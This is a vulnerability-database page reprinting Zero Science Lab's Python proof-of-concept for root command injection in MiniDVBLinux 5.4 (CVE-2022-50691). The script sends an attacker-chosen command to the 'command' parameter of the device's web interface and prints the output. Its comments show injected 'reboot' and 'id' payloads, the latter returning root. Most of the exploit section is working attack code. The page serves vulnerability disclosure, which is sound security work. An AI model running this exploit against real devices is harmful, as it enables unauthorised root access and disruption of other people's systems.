Vulners
Lucene search
MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Minidvblinux | 12 Jan 202618:42 | – | githubexploit |
 | CVE-2022-50691 | 31 Dec 202521:02 | – | circl |
 | MiniDVBLinux 安全漏洞 | 30 Dec 202500:00 | – | cnnvd |
 | CVE-2022-50691 | 30 Dec 202522:41 | – | cve |
 | CVE-2022-50691 MiniDVBLinux 5.4 Remote Root Command Execution via commands.sh | 30 Dec 202522:41 | – | cvelist |
 | EUVD-2022-55944 | 31 Dec 202500:31 | – | euvd |
 | CVE-2022-50691 | 30 Dec 202523:15 | – | nvd |
 | CVE-2022-50691 | 30 Dec 202523:15 | – | osv |
 | PT-2025-54230 | 30 Dec 202500:00 | – | ptsecurity |
 | CVE-2022-50691 MiniDVBLinux 5.4 Remote Root Command Execution via commands.sh | 30 Dec 202522:41 | – | vulnrichment |
10
<html><body><p>#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command execution vulnerability.
# This can be exploited to execute arbitrary commands as root, through the
# 'command' GET parameter in /tpl/commands.sh.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5718
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 002
#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot
#-
#test case 003
#http://ip:8008/?site=commands&section=system&command=id
#uid=0(root) gid=0(root)
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 Command Execution PoC')
print('Usage: ./mldhd_root1.py [url] [cmd]')
sys.exit(17)
else:
url = sys.argv[1]
cmd = sys.argv[2]
req = requests.get(url+'/?site=commands&section=system&command='+cmd)
req = requests.get(url+'/?site=commands&section=system&command='+cmd)
outz = re.search('log\'>(.*?)',req.text,flags=re.S).group()
print(outz.replace('log\'>','').replace('',''))
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2022 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 49.3
CVSS 3.19.8
EPSS0.00457
SSVC